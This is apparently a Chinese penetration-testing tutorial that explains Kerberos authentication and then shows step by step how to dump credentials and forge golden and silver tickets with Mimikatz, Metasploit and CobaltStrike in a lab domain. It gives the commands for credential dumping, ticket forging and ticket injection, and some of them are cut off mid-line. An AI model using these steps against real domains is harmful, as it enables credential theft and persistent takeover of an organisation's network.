内网渗透|Kerberos认证和黄金票据

本文涉及的产品
.cn 域名,1个 12个月
简介: 内网渗透|Kerberos认证和黄金票据

Kerberos认证

介绍

Kerberos是一种计算机网络授权协议,用来在非安全网络中,对个人通信以安全的手段进行身份认证。

这个词又指麻省理工学院为这个协议开发的一套计算机软件。

认证流程

提示:

AS(Authentication Server) 认证服务器

KDC(Key Distribution Center) 密钥分发中心

TGT(Ticket Granting Ticket) 票据授权票据(票据的票据)

TGS(Ticket Granting Server) 票据授权服务器

ACL(Access Control Lists) 访问控制列表

DC(Domain Controller) 域控制器

AD(Active Directory) 活动目录

Client 客户端

Server 服务端

详细流程图

91f6776b70aaa8dfb716cd214ad7e027_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg

黄金票据

原理

在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash,就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。

票据条件:

  • 域名称
  • 域的 SID 值
  • 域的 KRBTGT 账号的 HASH
  • 伪造D的任意用户名

实验环境

机器:

12server4

AD01


域名:

redteam.club

Mimikatz

12server4上操作

信息收集

前提域管权限

#导出hash
privilege::debug
lsadump::dcsync /domain:redteam.club /all /csv(lsadump::lsa /inject)
##一条命令
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:redteam.club /all /csv" "e

7d7d8f2177d59a5aff043bdfa7390205_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

1449b4fa263a50e5faba009f564524a4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

c775ce4ecaa195eac2d9f0449ca28042_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

制作

#制作黄金票据
mimikatz.exe "kerberos::golden /admin:system /domain:redteam.club /sid:S-1-5-21-2536

1cd3ae31b51c6df31de47df91c0dc955_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

导入

#清除票据
kerberos::purge
#导入票据
kerberos::ptt C:\Users\ticket.kirbi

a26d933da091956e97568231cfa9bb31_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Metasploit

12server4上操作

system权限信息收集

#信息收集
load kiwi   #导入kiwi模块
##提示:以下需要system权限
creds_all   #列举所有凭据
creds_kerberos  #列举所有kerberos凭据
kiwi_cmd sekurlsa::logonpasswords  #抓密码和hash

6d276437971695ef2ba80ca65c83319e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

22622eb0fb4c36a3a0550a3083e6a1c3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

147206f86802c36390cd602fe5107714_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

域管权限信息收集

#信息收集(需要域管权限)
kiwi_cmd "lsadump::dcsync /domain:redteam.club /user:krbtgt"  #krbtgt账户的密码hash值
kerberos_ticket_list  #列举kerberos票据 
kerberos_ticket_purge #清除kerberos票据

29beade574a777b1989a61bcd3f94ef4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3ce10725ceb73352c68300c684b3ac4e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

制作及导入

#制作金票
golden_ticket_create -d redteam.club -k 689fe33346a9e9fe229395fb36178ecb -u administrator -s S-1-5-21-2536581826-3274276096-3456299113 -t /home/kali/administrator.ticket
#导入金票
kerberos_ticket_use /home/kali/administrator.ticket

1e560fb1d41b090c5485b9a687983874_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

CobaltStrike

AD01上操作

注意

在使用CobaltStrike4.7时,只有在AD上才能抓取到krbtgt的hash,二前两个有域管权限就可以

希望可以得到师傅们的指点

12server4:12server4\administratorredteam\administrator均不成功

11ee90c5deead1ea71cccde6ace242c5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a798aafd8e8d1c5f0fc02b9d972a17d8_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

AD01:redteam\administrator成功抓取

2c0a9d6998c1dc9e670af4b20dabb9a7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

流程

1.抓取hash

5e3626714a7b4b7d7c1d970835ba9723_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

db8842f1447e64d9f7b8d6a38b7e46c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.shell whoami /all

11f8d71b5deeabf547f4cbd9e15a2726_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.制作金票

f7a56ff2535f02c5f980df1190795af5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4bde899b05e318937e8b7d953228d2b0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

91588336a675eff8a690f51a562dde2d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

白银票据

原理

白银票据就是伪造的ST。在Kerberos认证的第三部,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

票据条件:

  • 域名
  • 域 SID(就是域成员SID值去掉最后的)
  • 目标服务器的 FQDN
  • 可利用的服务
  • 服务账号的 NTLM Hash
  • 需要伪造的用户名

2d04a24c4b1b3f0b3e1341d2690db7c7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这里就制作一个

mimikatz

12server4上操作

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt

cifs

#命令格式
kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<伪造的用户名> /ptt
#示例
kerberos::golden /domain:redteam.club /sid:S-1-5-21-2536581826-3274276096-34562991

6bb114d18af0fee7f01cf8362fb73831_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
4月前
|
存储 运维 安全
防盗、防泄露、防篡改,我们把 ZooKeeper 的这种认证模式玩明白了
ZooKeeper 作为应用的核心中间件在业务流程中存储着敏感数据,具有关键作用。正确且规范的使用方法对确保数据安全至关重要,否则可能会因操作不当而导致内部数据泄露,进而带来严重的安全风险。因此,在日常的 ZooKeeper 运维和使用过程中,标准化和安全的操作对于加强企业安全防护和能力建设显得格外关键。为了实现这一目标,MSE 提供了一整套标准化流程,帮助用户以更安全、更简便的方式使用 ZooKeeper,从而加速企业安全能力的提升同时最大程度地降低在变更过程中可能出现的风险。
8980 7
|
5月前
|
Linux 数据安全/隐私保护
【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP
【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP
【权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP
|
6月前
|
安全 数据安全/隐私保护
如何设置多因素认证,但不使用短信验证码?
【5月更文挑战第14天】如何设置多因素认证,但不使用短信验证码?
85 0
|
缓存 安全 算法
域渗透 | kerberos认证及过程中产生的攻击
前言 Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos)。 认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课 https://www.bilibili.com/video/BV1S4411e7hr?spm_id_from=333.788.b_636f6d6d656e74.8 本篇文章主要内容是Kerberos认证过程中产生的攻击。
1133 0
|
安全
网站添加MySSL安全认证签章教程
我们对您的网站进行动态安全评估,若您精心部署的HTTPS符合最佳安全实践,我们将会为您的客户展示MySSL检测通过的安全签章和高评分的评级报告,提高客户对您网站的信任和支付信心,进而增加订单量,提升品牌价值。
330 0
网站添加MySSL安全认证签章教程
|
安全 网络安全
为您的网站添加SSL安全认证签章
为您的网站添加SSL安全认证签章
362 0
|
云安全 人工智能 运维
阿里云安全认证的等级 阿里云认证含金量高吗
相信大家对于阿里集团都不陌生,它是国内最大的网络公司之一,很多人都想要参加阿里云认证。下面认证大使就和大家一起来了解阿里云安全认证的等级,阿里云认证含金量高吗。
814 0
阿里云安全认证的等级 阿里云认证含金量高吗
|
新零售 安全 数据安全/隐私保护
盗取手机验证码诈骗的克星来了:号码认证服务为你保驾护航
今年开始,一种仿佛是“黑魔法”的新诈骗手段叫人人心惶惶:受害者只是睡了个觉,醒来就看到手机显示数百条在各大购物网站、手机银行甚至借贷网站的消费转账记录。受害者什么也没做,就仿佛手机成了精,趁主人熟睡时疯狂买买买。
2685 0
|
安全 数据安全/隐私保护 Android开发